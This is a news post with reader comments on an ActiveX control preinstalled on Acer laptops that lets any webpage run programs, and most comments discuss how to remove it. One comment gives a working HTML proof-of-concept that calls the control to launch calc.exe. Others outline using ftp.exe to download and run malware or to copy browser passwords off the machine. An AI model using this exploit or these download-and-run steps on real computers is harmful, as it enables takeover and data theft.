Acer May Be Bugging Computers

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

Aren't we a little late on this story?

[Anonymous Coward]

Change Log
2006-11-19 - Public Release.

Re:Phew!

[GFLPraxis]

It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.

present on Aspire 1690

[Phil246]

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Re:Phew!

[mallardtheduck]

My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.

Re:Phew!

[aauu]

I bought an HP core 2 duo media center pc back in September. Came with all the software in a special partition on the first hard drive. HP has online option to purchase restore dvds for $17 (shipping). Bought the disks just because I could. I have been running Vista RC2 o this computer and do not intend to go back. Vista is much more responsive than XP. One minor annoyance is that serial ports are no longer part of computer systems these days. I need to hook up a device that only supports serial not usb. Not all vendors are in this decade.

Safe

[twitter]

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmod before anyone else gets it.

Re:to those of us uneducated

[Anonymous Coward]

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.

One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.

Re:So can this be neutralized?

[plover]

Click Start/Run, then in the box type this:

del c:\windows\system\lunchapp.ocx

That will delete the object itself.

Re:to those of us uneducated

[codepunk]

I have not seen the control or have a copy of it but it can be a simple as a couple of lines
of script in a web page. Now I can possibly own most acer laptops visiting that page.

The script could do something like this
ftp somehost
ftp get somefile
execute somefile

Bingo I own your laptop.

Or say I just ftp your firefox data so I can grab your history, passwords etc.

Re:present on Aspire 1690

[valeurnutritive]

To remove this from your machine.

Goto Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)

Uhh, there already IS an exploit...

[nweaver]

Read the article: Theres a trivial piece of example "exploit" code running calc.exe.

But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

Late again!

[whoever57]

Apparently, someone in Brazil noticed this last November [extremepc.com.br]

Re:And now that it's publicized...

[Ninwa]

The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

Re:Phew!

[phalse phace]

Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

Re:Phew!

[mikek3332002]

I think they were going for humor mods.

Re:So can this be neutralized?

[Lehk228]

run regsvr32 -u lunchapp.ocx from start>run it will unload it without having to edit the registry

Re:to those of us uneducated

[codepunk]

You bet open up a command window and type ftp you will notice that it has a built in ftp client. Simply calling the run method on this control in a script and you can run anything you want, download or upload anything you want just by the client browsing a web page.

@mozilla.org/process/util;1

[MushMouth]

Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

Re:Phew!

[belmolis]

I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

Re:I'm not impressed with this IE7 "improvement"

[suv4x4]

The right direction would be running screaming away from active X entirely.

The hatred towards ActiveX is largely unfound. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins.

The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.

IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.

(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)

Re:Phew!

[Propaganda13]

Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

Re:to those of us uneducated

[dezert_fox]

This allows execution of arbitrary code... that's as bad as it gets. This could be used to do anything the computer can do. All files accessible to the current user could be uploaded somewhere else; machine could be made part of a botnet for DoS attacks; anything! Arbitrary code execution is a BAD, BAD thing.

Re:Wow

[sumdumass]

Maybe it would make more sence if you were a three or four year old kid fascinated with fire and we gave the matches to you.

And actualy the lawsuite for spilt coffee and a million bucks entailed the coffee being so hot it melted the cup were the lid fastened to it causing the spill after the compnay had been informed of the issue repeatedly and refused to do anything about it. she was only asking for medical bills and the jurry added to it. So yes, in a way, I guess this kind of relates.

This type of stuff shouldn't be able to happen after how many exploits causing malicious harm to computers. I guess the solution might be for people to stop thinking they need to upgrade or replace thir system whenever thier computers starts acting "worn out" and "slow". If someone on the supply end stops making a buck from every replacment, they might be more concerned with stoping them from breaking.

Re:It's an appendix.

[Zouden]

I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.

Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.

That's BS

[cheros]

Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.

All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.

As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..

Don't know about HP, but have handled enough Sony laptops :-)

Re:to those of us uneducated

[this great guy]

It is possible to use ftp.exe in such a way. I work in the ITsec field and have used this exploitation technique in the past (step 1: create foo.txt containing ftp commands to download malicious.exe, step 2: run ftp.exe @foo.txt, step 3: run malicious.exe).

I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?

Re:present on Aspire 1690

[mosschops]

Unregistering is just calling a function inside the DLL which deletes its own registry entries. It needs to be loaded for that to happen so being loaded already is no problem. When both have finished it'll get unloaded, and the lack of registry entries means the browser can't create an instance of it again.

I'm not sure I'd want to create a page to do it tho, even with full permission from the user...

Re:Wow

[willyhill]

Feel free. If you can get an exploit to work

Who's talking about an exploit? I can get people "infected" with XPI the same way people get "infected" by clicking "Yes" on that annoying ActiveX install dialog. It's much easier than trying to find an exploit. But we're drifting here - the issue is a PC vendor pre-installing something on my box. That's even easier, because it doesn't require user intervention!

but there are a number of things to prevent you from actually getting it installed.

Like what, a badly designed whitelist and a dialog where you have to click "No"? And you figure that the same people who used to click "Yes" on IE will click on "No" in Firefox, correct?

Until then, your full of hot air.

I think you're taking this too personally. Social engineering and stupidity are far more profitable for spammers and scammers than any exploit Microsoft could ever dream of.

Re:present on Aspire 1690

[Odin_Tiger]

I was under the impression that only the exe went in the second param, and flags went in the final. Shouldn't it be
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
?

Test/exploit code

[Koyaanisqatsi]

The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

Re:Phew!

[Zardoz44]

I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.

The upside is that it did some with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.

Beyond than, no problems yet. So I'm relatively pleased with HP for once.

Re:Phew!

[Tauvix]

I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.

Re:present on Aspire 1690

[Staale Nordlie]

You're right. It doesn't seem to matter though, as (like I said) it worked fine the way I did it. I got a confirmation message and my Acer laptop no longer runs calc.exe with the code from the article.

Re:Phew!

[Anonymous Coward]

We don't call pig "ham" we call it "pork".

It dates back to the Norman invasion of England, pork and beef are the Norman (french) words for those animals (porc and boeuf).

Same reason why we have redundant words like big/large.

Re:Phew!

[bigdavesmith]

I'm no meat scientist, but I believe this is because due to the nature of a chicken, and the various preparation methods, you can say "I want chicken!" and you get chicken. While you can be more specific, 'chicken' is sufficient.

On the other hand, if you walked into a restaurant and ordered 'Pig', you might get bacon, ham, or pork. Perhaps even a pork medallion wrapped in a strip of sweet, sweet bacon.

The variety of the animal available for consumption helps shape the ordering process. At least that's all I've got.

Question: is this another Acer backdoor?

[GreatBunzinni]

When I read this message what popped right on my mind was the existence of an administrator account which camed pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

P.S.: the article's backdoor was also present on my system. those bastards...

Re:Phew!

[AJWM]

Why do we call "pig" ham and "cow" beef?

It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the french words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (eg horse), wasn't.

BTW, the word "poultry" is similar to the french word for chicken -- poulet.

Re:Question: is this another Acer backdoor?

[ded_guy]

Sorry to ruin your paranoia, but the "ASP.NET Machine Account" (ASPNET) is created when the .net framework is installed. If you look at the description of the account, it's used to run the asp.net worker process (presumably so you can lock down your asp.net applications). As to why you can't delete it I'm not sure (preliminary googling says it should be removable from the users control panel (at the cost of breaking any asp.net applications running on your machine)). However, I'm not going to try here since I do development on this machine :)